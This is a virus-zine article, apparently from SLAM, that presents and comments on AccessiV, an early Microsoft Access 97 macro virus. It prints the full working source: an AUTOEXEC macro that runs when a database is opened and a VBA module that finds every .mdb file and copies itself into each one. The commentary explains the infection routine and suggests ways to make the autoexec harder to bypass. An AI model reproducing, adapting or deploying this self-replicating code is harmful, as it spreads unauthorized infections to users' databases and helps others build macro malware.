SLAM4.028: Access97Macro.AccessiV commented by Aurodreph/SLAM

Published in

· 2 years ago

--------------------------------------------- 
  The First ACCESS97 Macro virus, AccessiV 
	     , 
 By     <****{=============- 
	     ' AuRoDrEpH, the Drow 
---------------------------------------------

[ Access97Macro. AccessiV ]************* 

˛ VIRUS NAME:     AccessiV 
˛ SIZE:           12 288 Bytes 
˛ ORIGIN:         Unknown 
˛ AUTHOR:         Jerk1N of DIFFUSION 
˛ Total macros    1 

->Polymorphism    No 
->Self Modifying  No 
->Stealth         No 
->Encrypted       No 
->Retro           No 
->Destructive     No 

*****************************************

One of my friends discovered this interesting virus. I never heard before of an Access Virus. Now, this new kind of virus exists.

This is a very simple virus. When you open an infected database, the virus searches in your hard disk for all the database (*.mdb) then copy its macro and its module.

The macro AUTOEXEC is an automatic macro open by Access, same one than in Word or Excel.
The module VIRUS contains the infection routine.

One problem: I search in the help file of Access and i can find any common macro, like the NORMAL.DOT in Word.So you can't infect the soft.

Ways of Amelioration:

It's possible to protect more the access to the Autoexec macro. Use the AllowBypassKey = False
As for the Word97 virus, all the modifications are possible using the VBA.

Here is the source of the virus (Sorry, i can't translate the term Sablier)

note:

_ indicates continue in the same line
' indicates comment by the author in his virus source
'* indicates my comment

One Macro file : AUTOEXEC

Sablier Yes 'activate the transformation of the pointeur in sablier
Echo AccessiV, The new Access Macro Virus, by Jerk1N of DIFFUSION
RunCode AccessiV() 'call the infection routine in the module file
'* Runcode is a term for english version of Access
'* in the original source from Jerk1N it is called ExÈcuterCode
Sablier No 'desactivate the transformation of the pointeur in sablier

One Module file: Virus

Dim filename As String 
'* Access Options by default: 
Option Compare Database 
Option Explicit 

Public Sub findfirst() 
'search on the drive the first database 
'* MDB = MicroSoft Data Base 
filename = Dir("*.mdb", vbNormal)   'Find MS Database File! 
End Sub 

Public Sub infect() 
'It's the infection routine, simple but works well... 
On Error GoTo ohcrap      '* Error handle 
'* Copy macro Autoexec 
DoCmd.TransferDatabase acExport, "Microsoft Access", filename, _ 
acMacro, "Autoexec", "Autoexec" 
'* Copy module Virus 
DoCmd.TransferDatabase acExport, "Microsoft Access", filename, _ 
acModule, "Virus", "Virus" 
ohcrap: 
End Sub 

Public Function AccessiV() 
'this is the routine called by the Autoexec macro 
Call findfirst 
Call infect 
While filename <> ""         '* while dont Empty 
	Call findnext 
	Call infect 
Wend 
End Function 

Public Sub findnext() 
'searchs another database for infection... 
filename = Dir                      'Find another MS Database File! 
End Sub